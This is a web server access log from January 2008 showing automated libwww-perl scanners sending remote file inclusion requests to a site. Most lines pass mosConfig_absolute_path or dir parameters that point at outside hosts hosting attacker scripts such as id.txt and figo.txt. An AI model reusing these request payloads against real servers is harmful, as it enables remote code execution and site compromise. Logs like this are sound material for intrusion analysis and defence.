66.11.119.180 - - [31/Jan/2008:12:51:55 -0800] "GET /logs/access_071214.log//skin/zero_vote/ask_password.php?dir=http://www.californiasecession.org/discuss/images/themes/obb108/.jst/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.34.78.106 - - [31/Jan/2008:12:53:24 -0800] "GET /logs/access_071214.log//skin/zero_vote/ask_password.php?dir=http://www.ezydemo.com/_vti_var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.34.78.106 - - [31/Jan/2008:12:53:24 -0800] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.ezydemo.com/_vti_var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.13.229.88 - - [31/Jan/2008:12:58:19 -0800] "GET /logs/access_080117.log/administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.airmatrix.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.13.229.88 - - [31/Jan/2008:12:58:19 -0800] "GET /administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.airmatrix.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.13.229.88 - - [31/Jan/2008:12:58:19 -0800] "GET /logs/administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.airmatrix.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.13.229.88 - - [31/Jan/2008:12:58:23 -0800] "GET /logs/access_080117.log/administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.airmatrix.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.13.229.88 - - [31/Jan/2008:12:58:23 -0800] "GET /administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.airmatrix.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.13.229.88 - - [31/Jan/2008:12:58:23 -0800] "GET /logs/administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.airmatrix.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.13.229.88 - - [31/Jan/2008:12:58:24 -0800] "GET /logs/access_080117.log/administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.airmatrix.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.13.229.88 - - [31/Jan/2008:12:58:24 -0800] "GET /administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.airmatrix.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.13.229.88 - - [31/Jan/2008:12:58:24 -0800] "GET /logs/administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.airmatrix.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.13.229.88 - - [31/Jan/2008:12:58:30 -0800] "GET /logs/access_080117.log/administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.airmatrix.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.13.229.88 - - [31/Jan/2008:12:58:30 -0800] "GET /administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.airmatrix.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.13.229.88 - - [31/Jan/2008:12:58:30 -0800] "GET /logs/administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.airmatrix.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
82.102.11.34 - - [31/Jan/2008:12:58:40 -0800] "GET /logs/access_080117.log/administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.airmatrix.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.102.11.34 - - [31/Jan/2008:12:58:40 -0800] "GET /logs/access_080117.log/administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.airmatrix.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.102.11.34 - - [31/Jan/2008:12:58:40 -0800] "GET /logs/access_080117.log/administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.airmatrix.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.44.240.103 - - [31/Jan/2008:12:58:40 -0800] "GET /logs/access_080117.log/administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.airmatrix.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.44.240.103 - - [31/Jan/2008:12:58:40 -0800] "GET /logs/access_080117.log/administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.airmatrix.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.44.240.103 - - [31/Jan/2008:12:58:40 -0800] "GET /administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.airmatrix.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.44.240.103 - - [31/Jan/2008:12:58:40 -0800] "GET /administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.airmatrix.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.44.240.103 - - [31/Jan/2008:12:58:40 -0800] "GET /logs/administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.airmatrix.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
82.102.11.34 - - [31/Jan/2008:12:58:40 -0800] "GET /administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.airmatrix.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.102.11.34 - - [31/Jan/2008:12:58:40 -0800] "GET /administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.airmatrix.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.102.11.34 - - [31/Jan/2008:12:58:40 -0800] "GET /administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.airmatrix.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.102.11.34 - - [31/Jan/2008:12:58:41 -0800] "GET /logs/administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.airmatrix.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.102.11.34 - - [31/Jan/2008:12:58:41 -0800] "GET /logs/administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.airmatrix.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.102.11.34 - - [31/Jan/2008:12:58:41 -0800] "GET /logs/administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.airmatrix.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.44.240.103 - - [31/Jan/2008:12:58:41 -0800] "GET /logs/access_080117.log//?mosConfig_absolute_path=http://www.airmatrix.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.44.240.103 - - [31/Jan/2008:12:58:41 -0800] "GET /logs/access_080117.log//?mosConfig_absolute_path=http://www.airmatrix.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.44.240.103 - - [31/Jan/2008:12:58:41 -0800] "GET //?mosConfig_absolute_path=http://www.airmatrix.net/id.txt? HTTP/1.1" 200 2962 "-" "libwww-perl/5.808" "www.dmulk.com"
207.44.240.103 - - [31/Jan/2008:12:58:41 -0800] "GET //?mosConfig_absolute_path=http://www.airmatrix.net/id.txt? HTTP/1.1" 200 2962 "-" "libwww-perl/5.808" "www.dmulk.com"
207.44.240.103 - - [31/Jan/2008:12:58:41 -0800] "GET /logs//?mosConfig_absolute_path=http://www.airmatrix.net/id.txt? HTTP/1.1" 200 33218 "-" "libwww-perl/5.808" "www.dmulk.com"
207.44.240.103 - - [31/Jan/2008:12:58:41 -0800] "GET /logs//?mosConfig_absolute_path=http://www.airmatrix.net/id.txt? HTTP/1.1" 200 32546 "-" "libwww-perl/5.808" "www.dmulk.com"
207.44.240.103 - - [31/Jan/2008:12:58:42 -0800] "GET /logs/access_080117.log/administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.airmatrix.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.44.240.103 - - [31/Jan/2008:12:58:42 -0800] "GET /administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.airmatrix.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.44.240.103 - - [31/Jan/2008:12:58:42 -0800] "GET /logs/administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.airmatrix.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
82.102.11.34 - - [31/Jan/2008:12:58:42 -0800] "GET /logs/access_080117.log/administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.airmatrix.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.102.11.34 - - [31/Jan/2008:12:58:43 -0800] "GET /administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.airmatrix.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.102.11.34 - - [31/Jan/2008:12:58:43 -0800] "GET /logs/administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.airmatrix.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.44.240.103 - - [31/Jan/2008:12:58:43 -0800] "GET /logs/administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.airmatrix.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.13.229.88 - - [31/Jan/2008:12:58:46 -0800] "GET /administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.airmatrix.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.44.240.103 - - [31/Jan/2008:12:58:46 -0800] "GET /logs/access_080117.log//?mosConfig_absolute_path=http://www.airmatrix.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.44.240.103 - - [31/Jan/2008:12:58:46 -0800] "GET //?mosConfig_absolute_path=http://www.airmatrix.net/id.txt? HTTP/1.1" 200 2962 "-" "libwww-perl/5.808" "www.dmulk.com"
207.44.240.103 - - [31/Jan/2008:12:58:46 -0800] "GET /logs//?mosConfig_absolute_path=http://www.airmatrix.net/id.txt? HTTP/1.1" 200 32546 "-" "libwww-perl/5.808" "www.dmulk.com"
82.102.11.34 - - [31/Jan/2008:12:58:47 -0800] "GET /logs/access_080117.log/administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.airmatrix.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.102.11.34 - - [31/Jan/2008:12:58:47 -0800] "GET /administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.airmatrix.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.102.11.34 - - [31/Jan/2008:12:58:48 -0800] "GET /logs/administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.airmatrix.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.102.11.34 - - [31/Jan/2008:12:58:49 -0800] "GET /logs/access_080117.log//?mosConfig_absolute_path=http://www.airmatrix.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.102.11.34 - - [31/Jan/2008:12:58:50 -0800] "GET //?mosConfig_absolute_path=http://www.airmatrix.net/id.txt? HTTP/1.1" 200 2962 "-" "libwww-perl/5.805" "www.dmulk.com"
82.102.11.34 - - [31/Jan/2008:12:58:50 -0800] "GET /logs//?mosConfig_absolute_path=http://www.airmatrix.net/id.txt? HTTP/1.1" 200 33218 "-" "libwww-perl/5.805" "www.dmulk.com"
82.102.11.34 - - [31/Jan/2008:12:58:55 -0800] "GET /logs/access_080117.log//?mosConfig_absolute_path=http://www.airmatrix.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.102.11.34 - - [31/Jan/2008:12:58:55 -0800] "GET /logs/access_080117.log//?mosConfig_absolute_path=http://www.airmatrix.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.102.11.34 - - [31/Jan/2008:12:58:55 -0800] "GET //?mosConfig_absolute_path=http://www.airmatrix.net/id.txt? HTTP/1.1" 200 2962 "-" "libwww-perl/5.805" "www.dmulk.com"
82.102.11.34 - - [31/Jan/2008:12:58:55 -0800] "GET /logs/access_080117.log//?mosConfig_absolute_path=http://www.airmatrix.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.102.11.34 - - [31/Jan/2008:12:58:56 -0800] "GET //?mosConfig_absolute_path=http://www.airmatrix.net/id.txt? HTTP/1.1" 200 2962 "-" "libwww-perl/5.805" "www.dmulk.com"
82.102.11.34 - - [31/Jan/2008:12:58:56 -0800] "GET //?mosConfig_absolute_path=http://www.airmatrix.net/id.txt? HTTP/1.1" 200 2962 "-" "libwww-perl/5.805" "www.dmulk.com"
82.102.11.34 - - [31/Jan/2008:12:58:56 -0800] "GET /logs//?mosConfig_absolute_path=http://www.airmatrix.net/id.txt? HTTP/1.1" 200 32546 "-" "libwww-perl/5.805" "www.dmulk.com"
82.102.11.34 - - [31/Jan/2008:12:58:56 -0800] "GET /logs//?mosConfig_absolute_path=http://www.airmatrix.net/id.txt? HTTP/1.1" 200 33218 "-" "libwww-perl/5.805" "www.dmulk.com"
82.102.11.34 - - [31/Jan/2008:12:58:56 -0800] "GET /logs//?mosConfig_absolute_path=http://www.airmatrix.net/id.txt? HTTP/1.1" 200 32546 "-" "libwww-perl/5.805" "www.dmulk.com"
82.102.11.34 - - [31/Jan/2008:12:58:57 -0800] "GET /logs/access_080117.log//?mosConfig_absolute_path=http://www.airmatrix.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.102.11.34 - - [31/Jan/2008:12:58:57 -0800] "GET //?mosConfig_absolute_path=http://www.airmatrix.net/id.txt? HTTP/1.1" 200 2962 "-" "libwww-perl/5.805" "www.dmulk.com"
82.102.11.34 - - [31/Jan/2008:12:58:58 -0800] "GET /logs//?mosConfig_absolute_path=http://www.airmatrix.net/id.txt? HTTP/1.1" 200 32546 "-" "libwww-perl/5.805" "www.dmulk.com"
213.190.195.101 - - [31/Jan/2008:12:59:15 -0800] "GET /logs/access_080117.log/administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.airmatrix.net/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.190.195.105 - - [31/Jan/2008:12:59:15 -0800] "GET /logs/access_080117.log/administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.airmatrix.net/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.190.195.103 - - [31/Jan/2008:12:59:16 -0800] "GET /administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.airmatrix.net/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.190.195.100 - - [31/Jan/2008:12:59:16 -0800] "GET /administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.airmatrix.net/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.190.195.101 - - [31/Jan/2008:12:59:16 -0800] "GET /logs/administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.airmatrix.net/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.190.195.105 - - [31/Jan/2008:12:59:16 -0800] "GET /logs/administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.airmatrix.net/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.44.240.103 - - [31/Jan/2008:12:59:22 -0800] "GET /administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.airmatrix.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.11.119.180 - - [31/Jan/2008:12:59:22 -0800] "GET /logs/access_080104.log//skin/zero_vote/ask_password.php?dir=http://www.californiasecession.org/discuss/images/themes/obb108/.jst/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.44.240.103 - - [31/Jan/2008:12:59:23 -0800] "GET /administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.airmatrix.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.44.240.103 - - [31/Jan/2008:12:59:24 -0800] "GET //?mosConfig_absolute_path=http://www.airmatrix.net/id.txt? HTTP/1.1" 200 2962 "-" "libwww-perl/5.808" "www.dmulk.com"
207.44.240.103 - - [31/Jan/2008:12:59:24 -0800] "GET /administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.airmatrix.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.44.240.103 - - [31/Jan/2008:12:59:26 -0800] "GET //?mosConfig_absolute_path=http://www.airmatrix.net/id.txt? HTTP/1.1" 200 2962 "-" "libwww-perl/5.808" "www.dmulk.com"
206.33.2.131 - - [31/Jan/2008:12:59:32 -0800] "GET //skin/zero_vote/ask_password.php?dir=http://www.californiasecession.org/discuss/images/themes/obb108/.jst/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.190.195.101 - - [31/Jan/2008:12:59:35 -0800] "GET /logs/access_080117.log/administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.airmatrix.net/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.190.195.103 - - [31/Jan/2008:12:59:35 -0800] "GET /administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.airmatrix.net/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.190.195.105 - - [31/Jan/2008:12:59:41 -0800] "GET /logs/administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.airmatrix.net/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.190.195.104 - - [31/Jan/2008:12:59:57 -0800] "GET /administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.airmatrix.net/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.102.11.34 - - [31/Jan/2008:13:00:02 -0800] "GET /administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.airmatrix.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.102.11.34 - - [31/Jan/2008:13:00:02 -0800] "GET /administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.airmatrix.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.102.11.34 - - [31/Jan/2008:13:00:05 -0800] "GET /administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.airmatrix.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.102.11.34 - - [31/Jan/2008:13:00:05 -0800] "GET /administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.airmatrix.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.102.11.34 - - [31/Jan/2008:13:00:05 -0800] "GET /administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.airmatrix.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.102.11.34 - - [31/Jan/2008:13:00:12 -0800] "GET //?mosConfig_absolute_path=http://www.airmatrix.net/id.txt? HTTP/1.1" 200 2962 "-" "libwww-perl/5.805" "www.dmulk.com"
82.102.11.34 - - [31/Jan/2008:13:00:16 -0800] "GET //?mosConfig_absolute_path=http://www.airmatrix.net/id.txt? HTTP/1.1" 200 2962 "-" "libwww-perl/5.805" "www.dmulk.com"
207.44.240.103 - - [31/Jan/2008:13:00:18 -0800] "GET //?mosConfig_absolute_path=http://www.airmatrix.net/id.txt? HTTP/1.1" 200 2962 "-" "libwww-perl/5.808" "www.dmulk.com"
82.102.11.34 - - [31/Jan/2008:13:00:18 -0800] "GET //?mosConfig_absolute_path=http://www.airmatrix.net/id.txt? HTTP/1.1" 200 2962 "-" "libwww-perl/5.805" "www.dmulk.com"
64.13.229.88 - - [31/Jan/2008:13:00:49 -0800] "GET /logs/access_071230.log/administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.airmatrix.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.190.195.101 - - [31/Jan/2008:13:01:04 -0800] "GET /logs/access_080117.log//?mosConfig_absolute_path=http://www.airmatrix.net/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.190.195.101 - - [31/Jan/2008:13:01:04 -0800] "GET //?mosConfig_absolute_path=http://www.airmatrix.net/id.txt? HTTP/1.0" 200 2946 "-" "libwww-perl/5.805" "www.dmulk.com"
213.190.195.103 - - [31/Jan/2008:13:01:05 -0800] "GET /logs//?mosConfig_absolute_path=http://www.airmatrix.net/id.txt? HTTP/1.0" 200 32530 "-" "libwww-perl/5.805" "www.dmulk.com"
213.190.195.104 - - [31/Jan/2008:13:01:14 -0800] "GET /logs/access_080117.log//?mosConfig_absolute_path=http://www.airmatrix.net/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.190.195.104 - - [31/Jan/2008:13:01:14 -0800] "GET //?mosConfig_absolute_path=http://www.airmatrix.net/id.txt? HTTP/1.0" 200 2946 "-" "libwww-perl/5.805" "www.dmulk.com"
213.190.195.101 - - [31/Jan/2008:13:01:15 -0800] "GET /logs/access_080117.log//?mosConfig_absolute_path=http://www.airmatrix.net/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.190.195.103 - - [31/Jan/2008:13:01:15 -0800] "GET //?mosConfig_absolute_path=http://www.airmatrix.net/id.txt? HTTP/1.0" 200 2946 "-" "libwww-perl/5.805" "www.dmulk.com"
64.13.229.88 - - [31/Jan/2008:13:03:38 -0800] "GET /logs/access_071230.log/administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.airmatrix.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.13.229.88 - - [31/Jan/2008:13:03:44 -0800] "GET /logs/access_071230.log/administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.airmatrix.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.13.229.88 - - [31/Jan/2008:13:03:52 -0800] "GET /logs/access_071230.log/administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.airmatrix.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.44.240.103 - - [31/Jan/2008:13:04:39 -0800] "GET /logs/access_071230.log/administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.airmatrix.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.44.240.103 - - [31/Jan/2008:13:05:06 -0800] "GET /logs/access_071230.log/administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.airmatrix.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.44.240.103 - - [31/Jan/2008:13:05:26 -0800] "GET /logs/access_071230.log/administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.airmatrix.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.44.240.103 - - [31/Jan/2008:13:05:54 -0800] "GET /logs/access_071230.log//?mosConfig_absolute_path=http://www.airmatrix.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.44.240.103 - - [31/Jan/2008:13:05:58 -0800] "GET /logs/access_071230.log//?mosConfig_absolute_path=http://www.airmatrix.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.44.240.103 - - [31/Jan/2008:13:06:15 -0800] "GET /logs/access_071230.log//?mosConfig_absolute_path=http://www.airmatrix.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.85.105.25 - - [31/Jan/2008:13:06:28 -0800] "GET //skin/zero_vote/error.php?dir=ftp://80.50.253.90/upload/trop/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.85.105.25 - - [31/Jan/2008:13:06:28 -0800] "GET //skin/zero_vote/error.php?dir=ftp://80.50.253.90/upload/trep/slap/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
82.102.11.34 - - [31/Jan/2008:13:06:58 -0800] "GET /logs/access_071230.log/administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.airmatrix.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.102.11.34 - - [31/Jan/2008:13:06:58 -0800] "GET /logs/access_071230.log/administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.airmatrix.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
